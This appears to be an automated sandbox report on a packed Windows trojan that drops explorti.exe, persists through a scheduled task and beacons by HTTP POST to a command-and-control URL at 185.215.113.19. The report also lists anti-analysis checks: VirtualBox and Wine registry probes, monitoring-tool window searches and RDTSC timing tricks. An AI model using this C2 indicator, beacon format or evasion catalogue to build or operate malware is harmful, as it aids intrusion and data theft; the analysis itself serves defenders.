Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: Joe Sandbox View IP Address: 185.215.113.19
Source: Joe Sandbox View ASN Name: WHOLESALECONNECTIONSNL
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Code function: 7_2_0071BD60 InternetOpenW,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile, 7_2_0071BD60
Source: unknown HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: explorti.exe, 00000007.00000002.2891529475.00000000011BB000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000007.00000002.2891529475.00000000011FA000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000007.00000002.2891529475.000000000122A000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000007.00000002.2891529475.0000000001238000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.19/Vi9leo/index.php

System Summary

Source: f3wrBtIYXx.exe Static PE information: section name:
Source: f3wrBtIYXx.exe Static PE information: section name: .idata
Source: f3wrBtIYXx.exe Static PE information: section name:
Source: explorti.exe.0.dr Static PE information: section name:
Source: explorti.exe.0.dr Static PE information: section name: .idata
Source: explorti.exe.0.dr Static PE information: section name:
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe File created: C:\Windows\Tasks\explorti.job
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Code function: 7_2_00753068 7_2_00753068
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Code function: 7_2_0071E440 7_2_0071E440
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Code function: 7_2_00714CF0 7_2_00714CF0
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Code function: 7_2_00747D83 7_2_00747D83
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Code function: 7_2_0075765B 7_2_0075765B
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Code function: 7_2_00714AF0 7_2_00714AF0
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Code function: 7_2_0075777B 7_2_0075777B
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Code function: 7_2_00758720 7_2_00758720
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Code function: 7_2_00756F09 7_2_00756F09
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Code function: 7_2_00752BD0 7_2_00752BD0
Source: f3wrBtIYXx.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: f3wrBtIYXx.exe Static PE information: Section: ZLIB complexity 1.0
Source: f3wrBtIYXx.exe Static PE information: Section: bzkmssua ZLIB complexity 0.9941347082323538
Source: explorti.exe.0.dr Static PE information: Section: ZLIB complexity 1.0
Source: explorti.exe.0.dr Static PE information: Section: bzkmssua ZLIB complexity 0.9941347082323538
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@5/3@0/1
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe File created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: f3wrBtIYXx.exe Virustotal: Detection: 54%
Source: f3wrBtIYXx.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: explorti.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe File read: C:\Users\user\Desktop\f3wrBtIYXx.exe
Source: unknown Process created: C:\Users\user\Desktop\f3wrBtIYXx.exe "C:\Users\user\Desktop\f3wrBtIYXx.exe"
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe Process created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe "C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe Section loaded: winmm.dll
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe Section loaded: wininet.dll
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe Section loaded: mstask.dll
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe Section loaded: mpr.dll
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe Section loaded: dui70.dll
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe Section loaded: duser.dll
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe Section loaded: chartv.dll
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe Section loaded: oleacc.dll
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe Section loaded: atlthunk.dll
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe Section loaded: textinputframework.dll
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe Section loaded: coreuicomponents.dll
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe Section loaded: wtsapi32.dll
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe Section loaded: winsta.dll
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe Section loaded: textshaping.dll
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe Section loaded: propsys.dll
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe Section loaded: windows.fileexplorer.common.dll
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe Section loaded: explorerframe.dll
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe Section loaded: edputil.dll
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe Section loaded: slc.dll
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe Section loaded: sppc.dll
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32
Source: f3wrBtIYXx.exe Static file information: File size 1892864 > 1048576
Source: f3wrBtIYXx.exe Static PE information: Raw size of bzkmssua is bigger than: 0x100000 < 0x19ca00

Data Obfuscation

Source: C:\Users\user\Desktop\f3wrBtIYXx.exe Unpacked PE file: 0.2.f3wrBtIYXx.exe.6d0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;bzkmssua:EW;sxdezqxh:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;bzkmssua:EW;sxdezqxh:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Unpacked PE file: 1.2.explorti.exe.710000.0.unpack :EW;.rsrc:W;.idata :W; :EW;bzkmssua:EW;sxdezqxh:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;bzkmssua:EW;sxdezqxh:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Unpacked PE file: 2.2.explorti.exe.710000.0.unpack :EW;.rsrc:W;.idata :W; :EW;bzkmssua:EW;sxdezqxh:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;bzkmssua:EW;sxdezqxh:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Unpacked PE file: 7.2.explorti.exe.710000.0.unpack :EW;.rsrc:W;.idata :W; :EW;bzkmssua:EW;sxdezqxh:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;bzkmssua:EW;sxdezqxh:EW;.taggant:EW;
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
Source: explorti.exe.0.dr Static PE information: real checksum: 0x1d3758 should be: 0x1d0178
Source: f3wrBtIYXx.exe Static PE information: real checksum: 0x1d3758 should be: 0x1d0178
Source: f3wrBtIYXx.exe Static PE information: section name:
Source: f3wrBtIYXx.exe Static PE information: section name: .idata
Source: f3wrBtIYXx.exe Static PE information: section name:
Source: f3wrBtIYXx.exe Static PE information: section name: bzkmssua
Source: f3wrBtIYXx.exe Static PE information: section name: sxdezqxh
Source: f3wrBtIYXx.exe Static PE information: section name: .taggant
Source: explorti.exe.0.dr Static PE information: section name:
Source: explorti.exe.0.dr Static PE information: section name: .idata
Source: explorti.exe.0.dr Static PE information: section name:
Source: explorti.exe.0.dr Static PE information: section name: bzkmssua
Source: explorti.exe.0.dr Static PE information: section name: sxdezqxh
Source: explorti.exe.0.dr Static PE information: section name: .taggant
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Code function: 7_2_0072D84C push ecx; ret 7_2_0072D85F
Source: f3wrBtIYXx.exe Static PE information: section name: entropy: 7.988249586345587
Source: f3wrBtIYXx.exe Static PE information: section name: bzkmssua entropy: 7.9539160203429615
Source: explorti.exe.0.dr Static PE information: section name: entropy: 7.988249586345587
Source: explorti.exe.0.dr Static PE information: section name: bzkmssua entropy: 7.9539160203429615
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe File created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Boot Survival

Source: C:\Users\user\Desktop\f3wrBtIYXx.exe Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: Filemonclass
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe File created: C:\Windows\Tasks\explorti.job
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\f3wrBtIYXx.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 8D9ADF second address: 8D9AE3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 8DA1DC second address: 8DA1E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 8DDA54 second address: 8DDA59 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 89E299 second address: 89E2D4 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F5F64D1DABEh 0x00000008 jmp 00007F5F64D1DAC3h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 jg 00007F5F64D1DABCh 0x00000016 pushad 0x00000017 ja 00007F5F64D1DAB6h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 8DFD86 second address: 8DFDA4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F5F64D1DF24h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 8DEE87 second address: 8DEE91 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F5F64D1DABCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 8DFFFE second address: 8E0022 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F5F64D1DF16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F5F64D1DF26h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 8E0022 second address: 8E0078 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5F64D1DABEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d jmp 00007F5F64D1DAC3h 0x00000012 mov eax, dword ptr [eax] 0x00000014 push ebx 0x00000015 jnl 00007F5F64D1DABCh 0x0000001b pop ebx 0x0000001c mov dword ptr [esp+04h], eax 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F5F64D1DAC7h 0x00000027 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 8E5E38 second address: 8E5E43 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jns 00007F5F64D1DF16h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 8E63B8 second address: 8E63BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 8E88D7 second address: 8E88DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 8E88DC second address: 8E88E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F5F64D1DAB6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 8E88E6 second address: 8E890F instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F5F64D1DF16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c add dword ptr [esp], 172FBC6Eh 0x00000013 jnl 00007F5F64D1DF1Ch 0x00000019 push BE287C2Ch 0x0000001e pushad 0x0000001f push eax 0x00000020 push edx 0x00000021 push edx 0x00000022 pop edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 8E890F second address: 8E8926 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F5F64D1DAB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F5F64D1DABBh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 8E8A0B second address: 8E8A11 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 8E8A11 second address: 8E8A15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 8E94C6 second address: 8E94CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 8E94CC second address: 8E94FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F5F64D1DABFh 0x0000000e xchg eax, ebx 0x0000000f movzx edi, dx 0x00000012 nop 0x00000013 pushad 0x00000014 pushad 0x00000015 pushad 0x00000016 popad 0x00000017 pushad 0x00000018 popad 0x00000019 popad 0x0000001a push ebx 0x0000001b push edx 0x0000001c pop edx 0x0000001d pop ebx 0x0000001e popad 0x0000001f push eax 0x00000020 pushad 0x00000021 push edi 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 8E94FA second address: 8E9503 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 8E9503 second address: 8E9507 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 8E95DD second address: 8E95EC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5F64D1DF1Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 8E9FD0 second address: 8E9FE7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5F64D1DAC3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 8E9FE7 second address: 8EA005 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5F64D1DF20h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d je 00007F5F64D1DF16h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 8EBAC2 second address: 8EBACF instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 8EB32B second address: 8EB33E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5F64D1DF1Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
